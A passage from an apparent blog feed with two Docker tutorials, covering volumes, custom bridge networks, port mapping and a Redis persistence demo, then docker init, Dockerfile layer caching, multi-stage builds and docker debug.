cat &gt; /tmp/d4-site/index.html &lt;&lt; 'EOF'
&lt;h1&gt;Hello from a bind mount!&lt;/h1&gt;
EOF

docker run -d --name d4-web -p 8084:80 \
  -v /tmp/d4-site:/usr/share/nginx/html:ro nginx:alpine
</code></pre>
<p>The <code>:ro</code> flag means <strong>read-only</strong> - the container can read your files, but cannot modify them. This matters. More on that in section 6.</p>
<pre><code class="language-bash">curl -s http://localhost:8084 | grep '&lt;h1&gt;'
</code></pre>
<pre><code class="language-html">&lt;h1&gt;Hello from a bind mount!&lt;/h1&gt;
</code></pre>
<p>Now edit the file on your host and hit it again - no rebuild, no restart:</p>
<pre><code class="language-bash">echo '&lt;h1&gt;Updated LIVE!&lt;/h1&gt;' &gt; /tmp/d4-site/index.html

curl -s http://localhost:8084 | grep '&lt;h1&gt;'
</code></pre>
<pre><code class="language-html">&lt;h1&gt;Updated LIVE!&lt;/h1&gt;
</code></pre>
<p><strong>Best for:</strong> Local development with hot reload. Never use bind mounts in production — they create host dependency and break portability.</p>
<pre><code class="language-bash">docker stop d4-web &amp;&amp; docker rm d4-web
</code></pre>
<h3>tmpfs Mounts - Memory Only, Never Touches Disk</h3>
<pre><code class="language-bash">docker run --rm --tmpfs /app/scratch alpine sh -c \
  'echo "secret" &gt; /app/scratch/token.txt &amp;&amp; cat /app/scratch/token.txt'
</code></pre>
<pre><code class="language-plaintext">secret
</code></pre>
<p>The data lives in RAM. It is never written to disk and vanishes when the container stops. <strong>Best for:</strong> Secrets, API tokens, or scratch space that must never be persisted.</p>
<h3>The Decision Matrix</h3>
<table>
<thead>
<tr>
<th>Feature</th>
<th>Named Volumes</th>
<th>Bind Mounts</th>
<th>tmpfs</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Managed by Docker</strong></td>
<td>Yes</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td><strong>Survives container removal</strong></td>
<td>Yes</td>
<td>Yes (on host)</td>
<td>No</td>
</tr>
<tr>
<td><strong>Pre-populated with image data</strong></td>
<td>Yes</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td><strong>Performance</strong></td>
<td>Near-native</td>
<td>Native</td>
<td>Fastest</td>
</tr>
<tr>
<td><strong>Use in production</strong></td>
<td>Yes</td>
<td>No</td>
<td>Rarely</td>
</tr>
</tbody></table>
<blockquote>
<p><strong>Captain's Rule:</strong> When in doubt, use a named volume. Bind mounts are for development. tmpfs is for secrets. Named volumes are for everything else.</p>
</blockquote>
<hr />
<h2>3. Networks: Breaking Network Isolation</h2>
<p>You can persist data now. But a container that stores data and talks to nobody is just an expensive text file. Real applications are systems of services that need to <strong>find each other</strong>.</p>
<p>Docker networking has one massive gotcha, and I guarantee most tutorials will bury it three paragraphs too deep.</p>
<h3>The Default Bridge Trap</h3>
<p>Every container you have created so far lands on the <strong>default bridge network</strong>. Containers on the default bridge can reach each other by IP address — but <strong>not by name</strong>.</p>
<p>That means no DNS. No service discovery. Just raw IPs that change every time a container restarts. This is fine for throwaway experiments. It is terrible for anything real.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/2df4747b-a9d7-4f17-ad64-5c666f0c7b09.png" alt="" style="display:block;margin:0 auto" />

<h3>Custom Bridge Networks - DNS for Free</h3>
<p>Create a custom bridge network, and Docker gives you an embedded DNS server. Every container on that network is registered by its <code>--name</code>, and any other container can resolve that name to the correct IP.</p>
<pre><code class="language-bash">docker network create d4-net
</code></pre>
<p>Launch two containers on that network:</p>
<pre><code class="language-bash">docker run -d --name d4-web --network d4-net nginx:alpine

docker run -d --name d4-api --network d4-net nginx:alpine
</code></pre>
<p>Now ping by <strong>container name</strong> - not IP:</p>
<pre><code class="language-bash">docker exec d4-api ping -c 2 d4-web
</code></pre>
<pre><code class="language-plaintext">PING d4-web (172.22.0.2): 56 data bytes
64 bytes from 172.22.0.2: seq=0 ttl=64 time=0.721 ms
64 bytes from 172.22.0.2: seq=1 ttl=64 time=0.234 ms

--- d4-web ping statistics ---
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 0.234/0.477/0.721 ms
</code></pre>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/27369d7a-d5a8-44c5-b98d-7bd100bd0426.png" alt="" style="display:block;margin:0 auto" />

<p>That <code>172.22.0.2</code> could change tomorrow if you recreate the container. But <code>d4-web</code> as a DNS name will always resolve to whatever IP the <code>d4-web</code> container currently holds. This is the same pattern Kubernetes uses with its internal DNS — Docker just gives it to you for free on custom networks.</p>
<blockquote>
<p><strong>Key Concept:</strong> Default bridge = no DNS, hardcoded IPs, fragile. Custom bridge = automatic DNS, service discovery by name, resilient. Always create a custom bridge for multi-container applications.</p>
</blockquote>
<pre><code class="language-bash">docker stop d4-web d4-api &amp;&amp; docker rm d4-web d4-api
</code></pre>
<h3>The Full Isolation Spectrum</h3>
<p>Bridge networks are what you will use most days, but they are only two points on a wider spectrum. Docker ships several network modes, each sitting at a different level of isolation. Knowing they exist saves you from reaching for the wrong tool.</p>
<table>
<thead>
<tr>
<th>Network mode</th>
<th>Isolation level</th>
<th>When to reach for it</th>
</tr>
</thead>
<tbody><tr>
<td><code>none</code></td>
<td>Maximum: no networking at all</td>
<td>Batch jobs that should never touch the network. Forensic analysis. Testing graceful network-failure paths.</td>
</tr>
<tr>
<td>Custom bridge</td>
<td>Strong: project-scoped DNS, isolated from default bridge</td>
<td>99% of multi-container apps on a single host (the section above).</td>
</tr>
<tr>
<td>Default bridge</td>
<td>Weak: IP routing, no DNS</td>
<td>One-off experiments. Legacy quirks.</td>
</tr>
<tr>
<td><code>host</code></td>
<td>None: container shares the host's network namespace</td>
<td>Performance-critical apps where bridge NAT is the bottleneck. Low-level networking tools that must see every interface on the host.</td>
</tr>
<tr>
<td><code>overlay</code></td>
<td>Multi-host: one logical network spanning several Docker hosts</td>
<td>Swarm clusters. Multi-machine setups. Preview for the days when one laptop is not enough.</td>
</tr>
</tbody></table>
<p><code>--network host</code> drops the network wall entirely. Your container shares the host's network stack, sees every interface, binds ports directly without NAT. Fastest possible networking, zero translation. The cost: no port mapping is needed because there is no isolation, two containers cannot bind the same port, and you lose service-name DNS. Use it for monitoring agents, packet-capture tools, or latency-sensitive workloads on Linux.</p>
<pre><code class="language-bash">$ docker run --rm --network host alpine ip addr show | head -10
</code></pre>
<p>You will see the same interfaces as <code>ip addr show</code> on your host. That is the point: there is no separate network namespace.</p>
<p><code>--network none</code> removes networking completely. The container has only a loopback interface. No outbound connections, no inbound traffic, no DNS. This is the right choice for jobs that should never reach the network, or for proving that your application degrades gracefully when networking is unavailable.</p>
<pre><code class="language-bash">$ docker run --rm --network none alpine ping -c 2 google.com
</code></pre>
<pre><code class="language-plaintext">ping: bad address 'google.com'
</code></pre>
<p>No DNS, no route. Exactly as expected.</p>
<p><code>overlay</code> <strong>networks</strong> stretch a single logical network across multiple Docker hosts. They are how Swarm wires services together across a cluster of machines. You will not use overlay on a single laptop, but it is worth knowing the name for the day you graduate from one host to many.</p>
<blockquote>
<p><strong>Captain's Rule:</strong> Custom bridge for almost everything. <code>host</code> when bridge NAT is the bottleneck. <code>none</code> when the container should be airtight. <code>overlay</code> when you outgrow a single machine.</p>
</blockquote>
<hr />
<h2>4. Port Mapping: Breaking Host Isolation</h2>
<p>Volumes break filesystem isolation. Networks break container-to-container isolation. Port mapping breaks the final wall: <strong>host isolation</strong>.</p>
<p>By default, no traffic from your host machine can reach a container's internal ports. You explicitly map a host port to a container port with <code>-p</code>:</p>
<pre><code class="language-bash">docker run -d --name d4-nginx -p 8080:80 nginx:alpine
</code></pre>
<p>This means: "Traffic hitting <code>localhost:8080</code> on my host gets forwarded to port <code>80</code> inside the container."</p>
<pre><code class="language-bash">curl -s http://localhost:8080 | head -5
</code></pre>
<pre><code class="language-html">&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Welcome to nginx!&lt;/title&gt;
&lt;/head&gt;
</code></pre>
<p>Without <code>-p 8080:80</code>, that nginx process would be running and listening — but completely unreachable from your browser or curl.</p>
<h3>Port Mapping Syntax</h3>
<table>
<thead>
<tr>
<th>Syntax</th>
<th>Meaning</th>
</tr>
</thead>
<tbody><tr>
<td><code>-p 8080:80</code></td>
<td>Host 8080 → Container 80</td>
</tr>
<tr>
<td><code>-p 127.0.0.1:8080:80</code></td>
<td>Only bind to localhost (not exposed to network)</td>
</tr>
<tr>
<td><code>-p 8080:80/udp</code></td>
<td>UDP instead of TCP</td>
</tr>
<tr>
<td><code>-p 80</code></td>
<td>Map container port 80 to a random host port</td>
</tr>
</tbody></table>
<blockquote>
<p><strong>Captain's Rule:</strong> In production, always bind to <code>127.0.0.1</code> unless you explicitly want external traffic. A bare <code>-p 8080:80</code> binds to <code>0.0.0.0</code> — every network interface on your host, including public-facing ones.</p>
</blockquote>
<pre><code class="language-bash">docker stop d4-nginx &amp;&amp; docker rm d4-nginx
</code></pre>
<hr />
<h2>5. Putting It Together: Redis Service Discovery</h2>
<p>Time to combine everything. We will run a Redis container and an Alpine client on a custom network, use DNS-based service discovery to connect by name, and persist Redis data with a named volume.</p>
<h3>Set Up the Network and Volume</h3>
<pre><code class="language-bash">docker volume create d4-redis-data

docker network create d4-app-net
</code></pre>
<h3>Launch Redis with a Named Volume</h3>
<pre><code class="language-bash">docker run -d \
--name d4-redis \
--network d4-app-net \
-v d4-redis-data:/data \
redis:7-alpine redis-server --appendonly yes
</code></pre>
<p>The <code>--appendonly yes</code> flag tells Redis to persist data to disk (inside <code>/data</code>, which is backed by our volume). Without it, Redis keeps everything in memory and loses it all on restart.</p>
<h3>Connect an App Container by Name</h3>
<pre><code class="language-bash">docker run --rm -it \
--name d4-client \
--network d4-app-net \
redis:7-alpine redis-cli -h d4-redis
</code></pre>
<p>Notice <code>-h d4-redis</code> we connect using the <strong>container name</strong>, not an IP. Docker's embedded DNS resolves it automatically.</p>
<pre><code class="language-plaintext">d4-redis:6379&gt; SET greeting "Hello Day 4!"
OK
d4-redis:6379&gt; GET greeting
"Hello Day 4!"
d4-redis:6379&gt; exit
</code></pre>
<p>The value is set. Now kill the Redis container, start a fresh one with the same volume and network, and prove the data survived:</p>
<pre><code class="language-bash">docker rm -f d4-redis

docker run -d \
--name d4-redis \
--network d4-app-net \
-v d4-redis-data:/data \
redis:7-alpine redis-server --appendonly yes
</code></pre>
<pre><code class="language-bash">docker run --rm \
--network d4-app-net \
redis:7-alpine redis-cli -h d4-redis GET greeting
</code></pre>
<pre><code class="language-plaintext">"Hello Day 4!"
</code></pre>
<p>The container was destroyed and replaced. The data persisted (volume). The new client found it by name (custom network DNS). This is the pattern behind every microservice architecture - disposable compute, durable storage, DNS-based discovery.</p>
<h3>Cleanup</h3>
<pre><code class="language-bash">docker rm -f d4-redis
docker network rm d4-app-net
docker volume rm d4-redis-data d4-data
</code></pre>
<hr />
<h2>6. What Nobody Tells You</h2>
<p>Here is the section I wish someone had written for me when I was learning Docker.</p>
<h3>Bind Mounts With <code>:rw</code> Can Destroy Your Code</h3>
<p>By default, bind mounts are <code>:rw</code> (read-write). That means the container has <strong>full write access to your host directory</strong>. A misconfigured build step, a buggy script, or a careless <code>rm -rf</code> inside the container, will modify or delete your actual source code on the host.</p>
<pre><code class="language-bash"># This is dangerous:
docker run -v $(pwd):/app some-image npm run build
# If the build writes to /app, it's writing to YOUR filesystem.
</code></pre>
<p>Always use <code>:ro</code> for bind mounts unless the container genuinely needs to write back to the host. And when it does need to write, mount only the specific subdirectory it needs — never your entire project root with write access.</p>
<h3>The Default Bridge Has No DNS, And This Will Bite You</h3>
<p>I cannot stress this enough. The default bridge network does <strong>not</strong> provide DNS resolution. If you run two containers without <code>--network</code> and try to connect by name, it will fail silently or hang. I have seen teams waste hours debugging "connection refused" errors that were really just missing DNS because nobody created a custom network.</p>
<h3>Volume Data Outlives Everything</h3>
<p>Named volumes are not removed when you run <code>docker rm</code>, <code>docker system prune</code>, or even <code>docker system prune -a</code>. The only commands that touch volumes are <code>docker volume rm</code> and <code>docker volume prune</code>. This is by design, but it means orphaned volumes accumulate silently. Run <code>docker system df</code> monthly. You will be surprised.</p>
<h3>Port Mapping Bypasses Your Firewall</h3>
<p>On Linux, Docker's port mapping manipulates iptables directly. This means <code>-p 8080:80</code> can expose a service to the public internet <strong>even if your host firewall blocks port 8080</strong>. Docker inserts its rules before the firewall's. This is a well-known footgun and has led to real production incidents. Always bind to <code>127.0.0.1</code> explicitly if you only need local access.</p>
<hr />
<h2>7. Quick Reference</h2>
<h3>Volume Commands</h3>
<pre><code class="language-bash">docker volume create my-data          # Create a named volume
docker volume ls                       # List all volumes
docker volume inspect my-data          # Show volume details
docker volume rm my-data               # Delete a volume
docker volume prune                    # Remove unused anonymous volumes
docker volume prune -a                 # Remove ALL unused volumes (careful!)
</code></pre>
<h3>Network Commands</h3>
<pre><code class="language-bash">docker network create my-net           # Create a custom bridge
docker network ls                      # List all networks
docker network inspect my-net          # Show network details and connected containers
docker network rm my-net               # Delete a network
docker network connect my-net my-ctr   # Attach a running container to a network
docker network disconnect my-net my-ctr # Detach a running container
</code></pre>
<h3>Running Containers With Storage and Networks</h3>
<pre><code class="language-bash"># Named volume
docker run -v my-data:/app/data myimage

# Bind mount (read-only)
docker run -v /host/path:/container/path:ro myimage

# tmpfs
docker run --tmpfs /app/temp myimage

# Custom network with port mapping
docker run -d --name web --network my-net -p 8080:80 nginx:alpine

# The full combo: volume + network + port
docker run -d --name db \
  --network my-net \
  -v db-data:/var/lib/postgresql/data \
  -p 5432:5432 \
  postgres:17-alpine
</code></pre>
<h3>Common Database Volume Paths</h3>
<table>
<thead>
<tr>
<th>Image</th>
<th>Mount Path</th>
</tr>
</thead>
<tbody><tr>
<td><code>postgres</code></td>
<td><code>/var/lib/postgresql/data</code></td>
</tr>
<tr>
<td><code>mysql</code></td>
<td><code>/var/lib/mysql</code></td>
</tr>
<tr>
<td><code>mongo</code></td>
<td><code>/data/db</code></td>
</tr>
<tr>
<td><code>redis</code></td>
<td><code>/data</code></td>
</tr>
</tbody></table>
<hr />
<h2>Key Takeaways</h2>
<ol>
<li><p><strong>Containers are isolated by design.</strong> Breaking that isolation is not a failure — it is the entire point of building real applications with Docker.</p>
</li>
<li><p><strong>Volumes break filesystem isolation.</strong> Named volumes (Docker-managed, portable) for production. Bind mounts (host-mapped, live reload) for development. tmpfs (memory-only) for secrets.</p>
</li>
<li><p><strong>Custom bridge networks break network isolation.</strong> The default bridge has no DNS. A custom bridge gives you free service discovery by container name. Always create one.</p>
</li>
<li><p><strong>Port mapping breaks host isolation.</strong> <code>-p 8080:80</code> lets your host reach the container. Bind to <code>127.0.0.1</code> in production unless you intend public exposure.</p>
</li>
<li><p><strong>Volumes outlive containers.</strong> We proved it: killed Redis, started a fresh container with the same volume, and <code>GET greeting</code> still returned <code>"Hello Day 4!"</code>.</p>
</li>
<li><p><strong>DNS-based discovery is the pattern.</strong> Connect by container name, not IP. IPs change. Names do not. This is how Kubernetes works, too - learn the pattern now.</p>
</li>
<li><p><strong>Bind mounts with</strong> <code>:rw</code> <strong>can modify your host filesystem.</strong> Default to <code>:ro</code>. Mount only what you need. Never give a container write access to your entire project directory unless you understand the risk.</p>
</li>
</ol>
<hr />
<h2>What's Next: Day 5</h2>
<p>You can now persist data, connect containers by name, and expose services to your host. But you typed a lot of <code>docker run</code> commands today, each with a growing list of flags. Imagine managing ten services this way.</p>
<p>In <strong>Day 5: Docker Compose - Defining Multi-Container Applications</strong>, you will learn to describe your entire application stack in a single YAML file and bring it all up with one command. The volume mounts, networks, and port mappings you learned today will become simple declarations in a Compose file.</p>
<p>See you tomorrow.</p>
<hr />
]]></content:encoded></item><item><title><![CDATA[Day 3: Stop Writing Dockerfiles From Scratch]]></title><description><![CDATA[7 Days of Docker (2026), by Saloni Narang, Docker Captain & CNCF Ambassador

I'm a Docker Captain. I've reviewed many Dockerfiles, and I can tell you that every single Dockerfile tutorial on the inter]]></description><link>https://blog.kubesimplify.com/day-3-stop-writing-dockerfiles-from-scratch</link><guid isPermaLink="true">https://blog.kubesimplify.com/day-3-stop-writing-dockerfiles-from-scratch</guid><category><![CDATA[Docker]]></category><category><![CDATA[Dockerfile]]></category><category><![CDATA[docker images]]></category><category><![CDATA[docker captain]]></category><dc:creator><![CDATA[Saloni Narang]]></dc:creator><pubDate>Fri, 24 Apr 2026 17:10:21 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/9a9c22be-d40d-4d2e-a85a-9877ce728557.svg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong>7 Days of Docker (2026)</strong>, by Saloni Narang, Docker Captain &amp; CNCF Ambassador</p>
</blockquote>
<p>I'm a Docker Captain. I've reviewed many Dockerfiles, and I can tell you that every single Dockerfile tutorial on the internet starts the same way: <code>FROM</code>, <code>RUN</code>, <code>COPY</code>, <code>CMD</code>. Memorize four keywords. Congratulations, you know nothing.</p>
<p>Knowing the instructions is like knowing how to spell. It doesn't make you a writer. Today I'm not tell you syntax. Today I'm going to tell you to <strong>think</strong> about Dockerfiles: why each line exists, what order they go in, and what happens to your build time and image size when you get it wrong.</p>
<p>If you followed <a href="https://blog.kubesimplify.com/day-2-your-images-are-a-supply-chain-and-it-s-probably-broken">Day 2</a>, you already understand that images are stacked layers. Now you're going to create those layers yourself, and you're going to do it right the first time.</p>
<hr />
<h2>Table of Contents</h2>
<ul>
<li><p><a href="#1-docker-init-the-2026-way">1. docker init: The 2026 Way</a></p>
</li>
<li><p><a href="#2-tearing-apart-a-dockerfile">2. Tearing Apart a Dockerfile</a></p>
</li>
<li><p><a href="#3-the-cache-trick-that-changes-everything">3. The Cache Trick That Changes Everything</a></p>
</li>
<li><p><a href="#4-multi-stage-builds-its-not-about-size">4. Multi-Stage Builds: It's Not About Size</a></p>
</li>
<li><p><a href="#5-docker-debug-your-new-best-friend">5. docker debug: Your New Best Friend</a></p>
</li>
<li><p><a href="#6-what-nobody-tells-you">6. What Nobody Tells You</a></p>
</li>
<li><p><a href="#7-quick-reference">7. Quick Reference</a></p>
</li>
<li><p><a href="#whats-next-day-4">What's Next: Day 4</a></p>
</li>
</ul>
<hr />
<h2>1. docker init: The 2026 Way</h2>
<p>Here's my first controversial opinion of the day: <strong>stop writing Dockerfiles from scratch.</strong></p>
<p><code>docker init</code> exists. It asks you five questions and generates a very good Dockerfile, <code>.dockerignore</code>, <code>compose.yaml</code>, and a <code>README.Docker.md</code>. Here's what it actually looks like when you run it on a Node.js project:</p>
<pre><code class="language-plaintext">$ docker init

Welcome to the Docker Init CLI!

This utility will walk you through creating the following files with sensible defaults for your project:
  - .dockerignore
  - Dockerfile
  - compose.yaml
  - README.Docker.md

Let's get started!

? What application platform does your project use? Node
? What version of Node do you want to use? 20.17.0
? Which package manager do you want to use? npm
? What command do you want to use to start the app? node server.js
? What port does your server listen on? 3000

✔ Created → .dockerignore
✔ Created → Dockerfile
✔ Created → compose.yaml
✔ Created → README.Docker.md

→ Your Docker files are ready!
  Review your Docker files and tailor them to your application.
  Consult README.Docker.md for information about using the generated files.

! Warning → The following files required to run your application were not found.
  Create them before running your application:
  - package.json
  - package-lock.json
</code></pre>
<p>Five questions. Four files. And a warning that keeps you honest: it noticed <code>package.json</code> and <code>package-lock.json</code> don't exist yet. That warning matters, as you'll see in a moment.</p>
<p><strong>So why am I writing a blog post about Dockerfiles if a tool generates them?</strong></p>
<p>Because you need to understand what it generates. You need to be the person who can look at a generated Dockerfile and say "this is correct" or "this needs to change for our use case." <code>docker init</code> is where you start. Understanding is where you become dangerous.</p>
<p>Let's dissect what it actually produced, line by line.</p>
<hr />
<h2>2. Tearing Apart a Dockerfile</h2>
<p>This is the Dockerfile <code>docker init</code> actually generated. Not simplified. Not cleaned up. The real thing.</p>
<pre><code class="language-dockerfile"># syntax=docker/dockerfile:1

ARG NODE_VERSION=20.17.0

FROM node:${NODE_VERSION}-alpine

ENV NODE_ENV production

WORKDIR /usr/src/app

RUN --mount=type=bind,source=package.json,target=package.json \
    --mount=type=bind,source=package-lock.json,target=package-lock.json \
    --mount=type=cache,target=/root/.npm \
    npm ci --omit=dev

USER node

COPY . .

EXPOSE 3000

CMD node server.js
</code></pre>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/7ab366ab-336d-4e98-9217-5df133d71402.png" alt="" style="display:block;margin:0 auto" />

<p>Every decision in here is intentional. Let's go line by line.</p>
<p><code># syntax=docker/dockerfile:1</code>: This is a parser directive, not a comment. It must be the very first line. It pins the Dockerfile to the latest stable 1.x BuildKit syntax, ensuring consistent behaviour across different Docker versions, CI systems, and remote builders. In Docker 23.0+ BuildKit is on by default so <code>--mount</code> works without it, but on older installs or CI environments it may not. Keep it for portability.</p>
<p><code>ARG NODE_VERSION=20.17.0</code>: A build-time variable with a default. This means you can override it without touching the Dockerfile: <code>docker build --build-arg NODE_VERSION=22.0.0 .</code>. Pin to a specific version in production; override in CI when testing upgrades.</p>
<p><code>FROM node:${NODE_VERSION}-alpine</code>: Uses the ARG from above. Alpine is significantly smaller than Debian-based images, often reducing image size by several hundred MB. This is not "use Node." It's "start with this entire filesystem and runtime." Every line after this is built on top of Alpine + Node 20.17.0.</p>
<p><code>ENV NODE_ENV production</code>: Sets an environment variable that persists into the running container. At runtime, this tells Node frameworks like Express and Next.js to enable production-mode optimizations. Note: for <code>npm ci</code>, <code>NODE_ENV=production</code> alone does not skip devDependencies. The <code>--omit=dev</code> flag in the RUN step handles that explicitly.</p>
<p><code>WORKDIR /usr/src/app</code>: Sets the working directory for every subsequent instruction. Note it's <code>/usr/src/app</code>, not <code>/app</code>. This is the conventional location for Node apps per the Node Docker Best Practices guide. Docker creates it if it doesn't exist.</p>
<p><code>RUN --mount=type=bind ... npm ci --omit=dev</code>: This is the line that makes this Dockerfile different from what you'd write by hand. Three things happening at once:</p>
<ul>
<li><p><code>--mount=type=bind,source=package.json,target=package.json</code>: Binds your <code>package.json</code> into the container <em>only for this RUN step</em>. It is not persisted in the final image layer, but it still influences build cache. The file is available at build time, gone from the image afterward.</p>
</li>
<li><p><code>--mount=type=bind,source=package-lock.json,target=package-lock.json</code>: Same for the lockfile. This is why <code>docker init</code> warned us both files need to exist; it's reading them directly from your filesystem, not copying them.</p>
</li>
<li><p><code>--mount=type=cache,target=/root/.npm</code>: Mounts a persistent build cache at the npm cache directory. On the next build, npm reuses packages from this cache even if the image layer is rebuilt. Dramatically faster on repeated builds.</p>
</li>
<li><p><code>npm ci</code> instead of <code>npm install</code>: <code>ci</code> installs exactly what's in the lockfile, fails if there's a mismatch, and never modifies <code>package-lock.json</code>. Deterministic. Right for production builds.</p>
</li>
<li><p><code>--omit=dev</code> instead of <code>--production</code>: The modern flag name. Same effect: skips devDependencies.</p>
</li>
</ul>
<p><code>USER node</code>: Switches to the non-root <code>node</code> user <em>before</em> copying application code. This matters: files copied after this instruction are owned by <code>node</code>, not root. If an attacker compromises your app process, they land as an unprivileged user. Root in a container is not the same as root on the host, but it's still a risk you don't need to take.</p>
<p><code>COPY . .</code>: Copies your entire application source into the image. Comes <em>after</em> <code>USER node</code> so the files are owned correctly, and <em>after</em> <code>npm ci</code> so a source code change doesn't invalidate the dependency install step. The <code>.dockerignore</code> file (also generated by <code>docker init</code>) controls what gets excluded.</p>
<p><code>EXPOSE 3000</code>: Metadata only. It does not open a port by itself, but acts as metadata used by tools like Docker run -p, Compose, and Kubernetes. It documents what port the application listens on so that <code>docker run -P</code>, Compose, and orchestrators can wire it up automatically.</p>
<p><code>CMD node server.js</code>: The default command. Shell form, which means the shell (<code>/bin/sh -c</code>) wraps the process. The generated Dockerfile uses shell form here, which is simpler for a starter template. In production you may want exec form (<code>CMD ["node", "server.js"]</code>) so the Node process receives signals directly as PID 1. In short, shell form does not handle signals correctly. Exec form is preferred in production for proper shutdown handling.</p>
<p>Once you have your <code>package.json</code>, <code>package-lock.json</code>, and <code>server.js</code> in place, build and run with:</p>
<pre><code class="language-bash">docker build -t d3-app .
docker run -d --name d3 -p 3000:3000 d3-app
</code></pre>
<p>Then run <code>docker history d3-app</code> and pay attention to what is <em>not</em> there. <code>package.json</code> and <code>package-lock.json</code> will not appear as layers at all. They were bind-mounted during the RUN step, available to <code>npm ci</code>, but never copied into the image. The npm cache mount is the same story: it lives outside the image entirely. The only real weight your image carries is the <code>npm ci</code> layer and whatever your <code>COPY . .</code> step brings in.</p>
<hr />
<h2>3. The Cache Trick That Changes Everything</h2>
<p>This is where most tutorials fail you. They show the correct Dockerfile but never explain <em>why</em> the order matters. Let me fix that.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/0a25e08f-6f85-4056-955a-6b3445e5896b.png" alt="" style="display:block;margin:0 auto" />

<p>Docker's build cache works on one brutal rule: <strong>the moment a layer changes, every layer after it is rebuilt from scratch.</strong> Cache invalidation cascades downward. Always.</p>
<p>Here's what a bad Dockerfile looks like:</p>
<pre><code class="language-dockerfile">FROM node:20-alpine
WORKDIR /app
COPY . .                          # copies EVERYTHING
RUN npm install --production      # runs every time ANY file changes
CMD ["node", "server.js"]
</code></pre>
<p>You change one line in <code>server.js</code>. Docker sees that <code>COPY . .</code> has different input files. Cache busted. Which means <code>npm install</code> also reruns, even though your dependencies haven't changed. You wait 15 seconds for a zero-dependency-change build. Multiply that by 50 developers and 20 builds a day and you've burned hours.</p>
<p>Now the good version:</p>
<pre><code class="language-dockerfile">FROM node:20-alpine
WORKDIR /app
COPY package.json .               # dependencies change rarely
RUN npm install --production      # cached unless package.json changed
COPY server.js .                  # app code changes often, goes LAST
CMD ["node", "server.js"]
</code></pre>
<p>You change <code>server.js</code>. Docker checks: did <code>package.json</code> change? No. Cached. Did <code>npm install</code> inputs change? No. Cached. Only <code>COPY server.js .</code> reruns. Build time: sub-second.</p>
<p><strong>This is not a micro-optimization. This is a 10x difference in build time.</strong> I have seen real CI pipelines go from 4-minute builds to 25-second builds by fixing instruction order alone. No new hardware. No fancy caching service. Just understanding how layers work.</p>
<p>The rule is simple: <strong>things that change rarely go at the top. Things that change often go at the bottom.</strong> Dependency manifests before source code. System packages before application packages. Always.</p>
<hr />
<h2>4. Multi-Stage Builds: It's Not About Size</h2>
<p>Everyone explains multi-stage builds as "make your image smaller." That's true but it's the wrong framing. Multi-stage builds are about <strong>separation of concerns.</strong></p>
<p>Your build environment needs compilers, package managers, build tools, debug symbols. Your production environment needs <em>none of that.</em> Every tool in your production image is a tool an attacker can use. Every extra binary is attack surface. Multi-stage builds let you use a full workshop to build, then ship only the finished product.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/707d016e-aab7-42b5-9cde-78a1eee04b8b.png" alt="" style="display:block;margin:0 auto" />

<p>Here's a Go application using a multi-stage build:</p>
<pre><code class="language-dockerfile">FROM golang:1.22-alpine AS builder
WORKDIR /app
COPY go.mod go.sum ./
RUN go mod download
COPY . .
RUN CGO_ENABLED=0 GOOS=linux go build -o server

FROM alpine:3.20
RUN adduser -D appuser
COPY --from=builder /app/server /server
USER appuser
CMD ["/server"]
</code></pre>
<p><strong>Stage 1 (</strong><code>builder</code><strong>):</strong> Uses <code>golang:1.22-alpine</code>, which includes the full Go compiler, linker, and standard library. <code>go.mod</code> and <code>go.sum</code> are copied first so <code>go mod download</code> can be cached independently of source changes (the same caching logic as Node's dependency layer). <code>CGO_ENABLED=0</code> produces a fully static binary with no dynamic library dependencies, so the binary runs on any Linux-based image. If your project has no external modules, drop the <code>go.sum</code> copy and <code>go mod download</code> line, but you still need <code>go.mod</code> (Go 1.17+ refuses to build outside a module).</p>
<p><strong>Stage 2 (production):</strong> Starts fresh from <code>alpine:3.20</code>. Creates a non-root user. Copies <em>only the compiled binary</em> from stage 1. The Go compiler, source code, intermediate objects, all left behind. They never make it into the final image.</p>
<p>You can verify the size difference with <code>docker images</code> after building both. In practice, a static Go binary on top of Alpine typically weighs in around 10 to 20 MB, while a Node image carrying the full runtime and <code>node_modules</code> is usually well over 100 MB. The exact numbers depend on your dependencies, but the order-of-magnitude gap is consistent.</p>
<p>The more important win is attack surface. A Node image carries npm, a shell, a package manager, and dozens of utilities. If someone exploits a vulnerability in your app and gets code execution, they have tools to work with. A Go image on Alpine is far more restricted: running as a non-root user means no ability to install packages even though <code>apk</code> is present, and far fewer pre-installed utilities to abuse. For maximum restriction, use a distroless or scratch base in stage 2 and your production image won't even have a shell.</p>
<p><strong>Smaller images aren't just faster to pull. They have less attack surface.</strong></p>
<p>For compiled languages (Go, Rust, C, C++), multi-stage builds are non-negotiable. For interpreted languages (Node, Python, Ruby), you can't eliminate the runtime, but you can still use multi-stage to install build-time-only dependencies in a separate stage and copy only production artifacts forward.</p>
<hr />
<h2>5. docker debug: Your New Best Friend</h2>
<blockquote>
<p><strong>Note:</strong> <code>docker debug</code> is a Docker Desktop feature and requires a paid Docker subscription (Pro, Team, or Business). It is not included in open-source Docker Engine / Docker CE. Minimum Docker Desktop version is 4.33. Check with <code>docker debug --help</code> before relying on it.</p>
</blockquote>
<p>Here's a scenario: your multi-stage build produces a final image based on <code>alpine:3.20</code> or even <code>scratch</code> (a completely empty image). Something's wrong at runtime. You want to shell in and look around. But there's no shell in the image. <code>docker exec -it mycontainer sh</code> fails.</p>
<p>Enter <code>docker debug</code>:</p>
<pre><code class="language-bash">docker debug d3-go
</code></pre>
<p><code>docker debug</code> attaches a debug shell to <em>any</em> container or image, even distroless, even scratch-based, even stopped containers. It injects a temporary toolbox with a shell, common utilities, and diagnostic tools without modifying the target image.</p>
